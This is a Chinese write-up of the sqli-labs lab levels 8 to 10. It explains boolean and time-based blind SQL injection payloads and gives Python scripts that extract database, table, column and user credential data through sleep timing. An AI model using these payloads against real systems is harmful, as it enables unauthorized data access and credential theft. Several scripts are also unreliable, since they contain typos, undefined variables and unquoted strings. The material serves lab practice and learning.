sqli-labs8、9、10

盲注的学习，附加脚本

Less-8

尝试报错注入，失败，查看码源，报错被注释了。

加’回显消失，再加–+，回显正常，使用and语句判断使用布尔盲注。
?id=1' and left(database(),1)='s'--+you are in 又出现了，说明猜对了，依次爆出相应的数据。

Less-9

尝试所有方法失效，考虑用时间注入
`?id=1' and if(left(database(),1)='s',sleep(5),1)`这像是时间注入与布尔注入的组合。
接下来都可以爆出

Less-10

将'换成"即可，按照第九关的方法。

小结：

延时注入

时间延时注入正确会延迟，错误没有延迟。

语法

if(expr1,expr2,expr3)

如果expr1正确，则返回值为expr2,错误则返回expr3。

以第五为例子

爆库长

?id=1' and if(left(database(),1)='s',sleep(5),1)--+

爆表名

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(5),1)--+

爆列名

以此类推

附上脚本：

爆库

import requests

dic="abcdefghijklmnopqrstuvwxyz0123456789_"
flag=""

#payload: and if ((substr(database(),num,1)),sleep(3),1)
for i in range(1,8):
    for char in dic:
        url=""
        payload=" and if ((substr(database(),'"+str(i)+"',1))="+ char +",sleep(3),1)"
        url = url + payload
        #print(url)

        try: #可能存在异常
            requests.get(url=url,timeout=3)		#等于3秒
        except requests.exceptions.ReadTimeout as e :	#超过三秒
            flag= flag + char
            print(flag)

爆表

import reuqests
dic=""

for table_num in range(0,2):
    flag=""
    for char_num in range(1,11):
        for char in dic:
            url=""
            payload= and if((substr((select table_name from information_schema.tables where table_schema=database() limit "+str(table_num)+",1),"+str(char_num)"+,1)='"+char+"'),sleep(3),1)
            url=url+payload
            try:
                r=reuqests.get(url=url,timeout=3)
            except:
                flag+=char
                print(flag)
    print('table_name'+flag)

爆字段名

import requests

dic=""

for column_num in range(0,3):#三个字段名
    flag=""
    for char_num in range(1,11)
        for char in dic:
            url=
            payload=" and if((substr((select column_name from information_schema.columns where table_name='security' limit "+str(column_num)+",1),"+str(char_num)+",1)='"+char+"'),sleep(3),1)"
            url+=payload
            try:
                r=requests.get(url=url,timeout=3)
            except:
                flag+=char
                print(flag)
    print('column_num:'+flag)

爆id，username，password数据

import requests


dic=""

for item in ['id','username','password']:
    for i in range(1,51):#长度50
        for char in dic:
            url=""
            payload=" and if(substr((select "+item+" from security limit "+str(record_num)+"),"+str(i)+",1)='"+char+"',sleep(3),1)"
            url=url+payload
            try:
                r=requests.get(url=url,timeout=3)
            except:
                flag+=char
                print(flag)

        print("data:"+flag)